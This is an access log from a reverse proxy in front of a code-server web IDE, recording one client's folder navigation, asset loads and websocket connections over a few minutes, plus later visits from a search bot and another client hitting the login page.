"https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:11:56 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:11:56 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:11:56 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:11:57 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:11:57 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=7de3ee0b-30f4-4eb0-b609-5a390bac06bd" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:12:00 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:12:17 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=d87111a1-f8f6-434e-a486-59b8283102a6&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 825308] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:12:17 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=a6a61b75-952a-41d5-b965-a6215280535a&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 9678] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:12:17 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:12:18 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:18 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:18 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:18 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:18 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:18 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:18 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=a57ee5c0-a5da-4299-ab60-66175c4fe153" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:19 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:21 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:12:45 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=dfd7ddb5-fdd7-4538-aba9-2d9755bd9882&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 918574] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:12:45 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=1e9987af-2d2d-4eda-9a40-1426d92412e9&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 12126] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:12:45 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 43] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:12:45 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:12:45 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:45 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:45 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:46 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:46 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:46 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:46 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:46 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=7ad62e34-6bcc-4989-9ae2-a4fde554800a" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:12:48 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:13:12 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=cb4ed6b1-3773-4c46-8638-95e2c7f77d11&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1007289] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:12 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=04b32aef-bb10-4082-a6a7-6aa8fbe398b4&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 11327] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:18 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 43] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:18 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:19 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:19 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:19 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:21 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:13:21 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:21 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:22 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:22 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=9df12b16-2acd-49eb-afc8-6e80ed4f9a4e" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt" +[26/Jan/2026:07:13:25 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:13:28 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=72c41d51-a9e5-41a9-8509-d03cac4869e5&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 916660] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:28 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=d136bb6b-986f-4fcd-ad7b-1b7981436713&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 11151] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:29 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt/service_finder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:29 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:29 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:29 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:30 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:30 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:30 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:30 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=1e04386f-9387-41e0-891b-2c7483350285" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:30 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:32 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:13:38 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3266a2bb-bbe9-4367-9418-30f0a6b4e1a9&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 917038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:38 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=8e415823-fb7b-4676-96b2-9ec2718891a2&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 10825] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:39 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/opt/service_finder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:13:39 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:39 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:39 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:39 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:40 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:40 +0000] - 304 304 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:40 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=df5d62b0-2d6d-4542-9525-4047bbaa6e07" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[26/Jan/2026:07:13:42 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:48:21 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-ligatures/lib/addon-ligatures.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/opt/service_finder" +[27/Jan/2026:01:34:31 +0000] - 200 200 - GET https code.profibot.hu "/robots.txt" [Client 74.7.175.130] [Length 26] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[27/Jan/2026:02:53:06 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.38] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[27/Jan/2026:02:53:06 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.38] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" 